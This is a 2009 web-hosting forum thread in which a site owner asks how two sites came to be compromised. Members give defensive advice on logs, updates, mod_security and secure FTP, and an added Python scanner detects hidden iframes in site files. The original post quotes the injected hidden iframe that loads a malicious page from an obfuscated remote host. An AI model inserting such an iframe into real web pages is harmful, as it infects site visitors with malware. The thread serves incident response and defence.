
Website Technology Issues Forum

    
Two of my websites hacked on the same day
dunhill

5+ Year Member



 
Msg#: 3950565 posted 7:45 am on Jul 11, 2009 (gmt 0)

2 of my websites were hacked on the same day; one is hosted by a very large hosting company and the other is my own server.

If it was just my server that got hacked I would have thought that I haven't made my server secure enough.

On my own server I have root access, on the other server it's just FTP access, passwords are different, one is Plesk, the other is cPanel.

Most of the index.php and other php scripts were modified to include the following

<iframe src="http://example.ru:8080/index.php" width=189 height=120 style="visibility: hidden"></iframe>

I was first made aware when I got an email from Google advising me of the problem - "We recently discovered that some of your pages can cause users to be infected with malicious software."

The question is how did they hack me, and what can I do to prevent it?

Thank you for your help

[edited by: encyclo at 11:40 am (utc) on July 11, 2009]
[edit reason] obfuscated link to hacker website [/edit]
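
Added example (not part of the original post or thread): a Python scanner to run over a local copy of the site, listing every file that contains a hidden iframe like the one quoted above and the host it points to. The file-extension list, the 0/1-pixel size heuristic and the function names are assumptions of this example.

```python
import os
import re
import sys
from urllib.parse import urlparse

IFRAME_RE = re.compile(r"<iframe\b[^>]*>", re.I | re.S)
# Attribute values: double-quoted, single-quoted, or bare (as in width=189).
ATTR_RE = re.compile(r"""([\w-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))""")
HIDDEN_STYLE_RE = re.compile(r"visibility\s*:\s*hidden|display\s*:\s*none", re.I)
EXTENSIONS = (".php", ".html", ".htm", ".tpl", ".inc")
# Constructed sample: a PHP page with the iframe from the post appended.
SAMPLE = '<?php echo "home"; ?>\n<iframe src="http://example.ru:8080/index.php" width=189 height=120 style="visibility: hidden"></iframe>\n'


def find_hidden_iframes(text):
    """Return [(line_no, src_host, tag)] for iframes hidden from the visitor."""
    hits = []
    for m in IFRAME_RE.finditer(text):
        attrs = {k.lower(): (a or b or c) for k, a, b, c in ATTR_RE.findall(m.group(0))}
        hidden = bool(HIDDEN_STYLE_RE.search(attrs.get("style", "")))
        # Assumption: 0- or 1-pixel frames are treated as hidden as well.
        tiny = any(attrs.get(d, "").strip().rstrip("px") in ("0", "1") for d in ("width", "height"))
        if hidden or tiny:
            host = urlparse(attrs.get("src", "")).netloc or "(relative or no src)"
            hits.append((text.count("\n", 0, m.start()) + 1, host, m.group(0)))
    return hits


def scan_tree(root):
    """Walk root and return {path: hits} for every file with a hidden iframe."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = find_hidden_iframes(fh.read())
                if hits:
                    report[path] = hits
    return report


if __name__ == "__main__":
    if len(sys.argv) > 1:  # usage: python scan_iframes.py /path/to/site-copy
        for path, hits in sorted(scan_tree(sys.argv[1]).items()):
            for line_no, host, _tag in hits:
                print(f"{path}:{line_no}: hidden iframe -> {host}")
    else:
        print(find_hidden_iframes(SAMPLE))
```

It only matches literal iframe tags, so injections written out by obfuscated script will not be listed; comparing files against a known-good backup covers those.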

 

janharders

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3950565 posted 8:09 am on Jul 11, 2009 (gmt 0)

Look through your Apache error logs.
With the shared hosting it might have been a local attack, but on your own server (I guess you did have strong passwords?) that can be doubted. I was once asked to clean an infected site and I searched for the entry point and found the error log extremely helpful in identifying the Joomla module that was exploited. They need a way to load code from a remote machine and they'll usually try multiple times before it succeeds - and these tries can get logged.

Do you use some public cms on both sides? That's what you should look at first.
What you can do to prevent it: stay up to date with your non-inhouse scripts. Once an exploit is in the open, they'll use Google to find exploitable sites and just run their bots to try it. Stay ahead. You might also want to look at mod_security, at least for your dedicated server.

dunhill

5+ Year Member



 
Msg#: 3950565 posted 8:39 am on Jul 11, 2009 (gmt 0)

I don't use any CMS, there is no common software between the 2 sites.

I also have mod_security already running on my server.

The passwords are secure, not based on names; they have both alpha and numeric characters.

I will have a look at the apache logs.

encyclo

WebmasterWorld Senior Member, WebmasterWorld Top Contributor of All Time, 10+ Year Member



 
Msg#: 3950565 posted 11:31 am on Jul 11, 2009 (gmt 0)

There are a few Windows virus variants around (such as "gumblar") which infect your local machine and steal FTP passwords from programs such as Filezilla. You should probably start by scanning your local machine for those viruses. Then you will need to change all your passwords.

Note that FTP is inherently insecure because the password is transmitted in plain text - using ssh (secure FTP) is a much better option; most FTP clients support secure FTP out of the box, and your servers almost certainly will too.

janharders

WebmasterWorld Senior Member 5+ Year Member



 
Msg#: 3950565 posted 1:10 pm on Jul 11, 2009 (gmt 0)

using ssh (secure FTP) is a much better option

Just to add: FTP over SSL (FTPS) is also much more secure than regular FTP, and I've found it to perform better than SFTP in my setup.

WebmasterWorld is a Developer Shed Community owned by Jim Boykin.
© Webmaster World 1996-2014 all rights reserved